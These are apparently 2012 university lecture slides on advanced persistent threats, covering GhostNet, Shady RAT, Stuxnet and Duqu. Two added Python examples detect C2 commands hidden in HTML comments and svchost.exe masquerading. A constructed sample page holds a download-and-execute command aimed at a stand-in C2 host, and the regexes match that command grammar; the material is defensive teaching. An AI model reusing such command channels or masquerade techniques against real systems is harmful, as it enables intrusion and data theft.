Advanced Persistent Threats CS461/ECE422 Spring 2012.

Traditional Malware
- Infect as many machines as possible
  – Non-discriminating
- Goal is the machine's resources, less so the information on the machine
- Use CPU resources
  – Sell DDoS abilities
  – Sell spam abilities
- Use machines for storage
  – Stash stolen or illicit information on the infected machine
- Use network resources
  – Launch attacks, or route them indirectly through infected machines
- Even where information is the goal, the specific owner of the information is not important
  – Gather credit card numbers
  – Perform extra bank transactions

Advanced Persistent Threat (APT)
- Has been there all along; it has just gotten more attention recently
- Attacker is concerned with the specific target
  – Discriminating, narrow, focused attack
  – E.g., attacker wants to find specific information from a specific organization
- May perform some more generic infection techniques, but the ultimate goal is very specific

Successful APT
- Lower volume
  – Unlikely to be part of the standard virus scanner/IDS signature base
  – Generally the ones that are discovered are not particularly interesting
- Evolving
  – Perhaps changing on each campaign
- Focused
  – Just being more secure than your neighbors may not be good enough

Tibet GhostNet
- Discovered March 2009
- Infection initiated via targeted infected emails
  – Infected attachment installs a Trojan
  – Trojan contacts the control server and waits for commands
- One command installed Gh0st RAT, which allows complete control of a Windows system

Shady RAT
- RAT = Remote Access Trojan
- Report released by McAfee in August 2011
  – operation-shady-rat.pdf
  – Reviewed the logs of one CNC (command-and-control) botnet starting from 2006
- The botnet infiltrated many government and commercial organizations
  – Claimed sophisticated attack and targeted information gathering
  – Concretely identified 71 infiltrated organizations

How is the target computer infected?
- Send emails to people at the target organization
  – Infected attachments, e.g. MS Word, Excel, PDF, PowerPoint
  – Victim opens the infected attachment; this results in extra code executing, which installs a Trojan
- Trojan attempts to contact some hard-coded sites
  – Generally HTML or JPEG, which don't arouse much attention from the firewall or other network defenses
  – Commands are encrypted in the comments of the HTML file, or embedded in the JPEG using steganographic techniques
  – Example commands:
    Run:{URL/Filename} – Download and execute file
    Sleep:{number} – Sleep for the specified time
- Info from Symantec review
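As an added example (not from the slides or from any report they cite), a defender-side content check for the hidden command channel just described: pull every HTML comment out of a fetched page and flag the Run:{...} / Sleep:{...} pattern, while ordinary build-stamp comments pass. The sample page and the host name in it are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: an innocuous-looking page of the kind the slides
# describe, with operator commands hidden in HTML comments.  Hypothetical
# content and host name, not a real capture.
SAMPLE_HTML = """<html><head><title>Weather</title></head>
<body>
<!-- page generated 2011-08-01 by cms -->
<p>Partly cloudy, high of 78.</p>
<!-- Run:{http://c2.example.invalid/update/setup.exe} -->
<!-- Sleep:{3600} -->
</body></html>"""

# HTML comments, including ones spanning several lines
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# Command grammar from the slides: Keyword:{argument}
COMMAND_RE = re.compile(r"\b(Run|Sleep)\s*:\s*\{([^}]*)\}")


@dataclass
class HiddenCommand:
    verb: str
    arg: str


def extract_hidden_commands(html: str) -> List[HiddenCommand]:
    """Return Run/Sleep style commands found inside HTML comments.

    Only comment bodies are inspected, so the same text in visible
    markup is ignored, and benign comments yield nothing."""
    found = []
    for body in COMMENT_RE.findall(html):
        for verb, arg in COMMAND_RE.findall(body):
            found.append(HiddenCommand(verb, arg.strip()))
    return found


def is_suspicious(html: str) -> bool:
    """True when at least one hidden command is present."""
    return bool(extract_hidden_commands(html))
```

The same check can run on a proxy's cached responses; a hit on a page the Trojan polls is the kind of low-volume indicator a generic signature base would miss.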

Using the machine once it's infected
- Using the {IP Address}:{port} command, the Trojan connects to the remote server
  – Copies cmd.exe to svchost.exe and launches the new copy of the cmd shell to listen on the port
  – Lots of instances of svchost run on a Windows machine, so one more blends in
- This gives the attacker almost complete freedom to launch their attack from the infected machine
- Does not use very sophisticated techniques
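An added example, not from the slides: a host-hunting check for the svchost.exe masquerade described above. It assumes the usual Windows layout, where a legitimate svchost.exe image lives in System32 or SysWOW64 and is started by services.exe; the process snapshot is constructed.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    image: str  # full path of the executable image


# Constructed process snapshot (not from a real host).  The last entry is
# the pattern from the slides: cmd.exe copied to svchost.exe and started
# from a user-writable directory by explorer.exe instead of services.exe.
SNAPSHOT = [
    Proc(4, 0, "System", ""),
    Proc(600, 4, "wininit.exe", r"C:\Windows\System32\wininit.exe"),
    Proc(700, 600, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(900, 700, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(950, 700, "svchost.exe", r"C:\Windows\SysWOW64\svchost.exe"),
    Proc(2100, 1500, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(3300, 2100, "svchost.exe",
         r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
]

# Assumed legitimate homes of svchost.exe (lower-cased for comparison)
LEGIT_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def svchost_anomalies(procs: List[Proc]) -> List[Tuple[int, List[str]]]:
    """Return (pid, reasons) for every svchost.exe that looks out of place."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        if p.name.lower() != "svchost.exe":
            continue
        reasons = []
        image_dir = str(PureWindowsPath(p.image).parent).lower()
        if image_dir not in LEGIT_DIRS:
            reasons.append(f"image outside System32/SysWOW64: {p.image}")
        parent = by_pid.get(p.ppid)
        pname = parent.name if parent else "unknown"
        if pname.lower() != "services.exe":
            reasons.append(f"parent is {pname}, not services.exe")
        if reasons:
            findings.append((p.pid, reasons))
    return findings
```

A listening socket on its own is not a useful discriminator here, since real svchost-hosted services listen too; the image path and parent are what give the copied shell away.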

Stuxnet
- Came to public attention in June 2010, but in hindsight appeared in November 2008
  – Symantec analysis: response/whitepapers/w32_stuxnet_dossier.pdf
- Truly more sophisticated
  – Replicates via removable drives (jumping the air gap)
  – Also leverages SMB and printer spooling vulnerabilities, plus much more
  – Sophisticated binary hiding and execution
- Targets a specific industrial control system (a Siemens PLC); ultimately installs a rootkit on that PLC
  – Supposedly the code altered the behavior of centrifuges in a subtle way: enough to alter the results of the centrifuging, but not enough that the operator would notice right away

W32.Duqu
- Probable evolution of the Stuxnet code base
- Reports released around October 2011
  – Symantec report: e/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf
- Still figuring out the original infection vectors
  – One appears to be a zero-day MS Word .doc issue (day-exploit)
- Infected execution starts through a registered device driver
  – Device driver is loaded on system boot
  – Device driver is signed with a legitimately issued certificate, so it does not raise attention
  – The driver injects a main DLL into services.exe
  – The main DLL is encrypted on disk; the key is stored in the registry

Duqu loading
- Performs basic anti-debugging checks
  – Are debugging types of processes running?
  – Uninstalls itself if it has been running for 36 days
- The next phase is loaded from an encrypted resource in the main DLL
  – The resource is decrypted into memory
  – The new DLL is injected into a standard process such as explorer.exe
- The newly injected code is a payload loader
  – It gets information from the CNC server
  – It uses rootkit techniques to execute the payload bytes (load library) without ever writing the bytes to disk
- Ultimately, it appears that the malware installs info-stealing software
  – Appears to exchange data via information embedded in JPEG files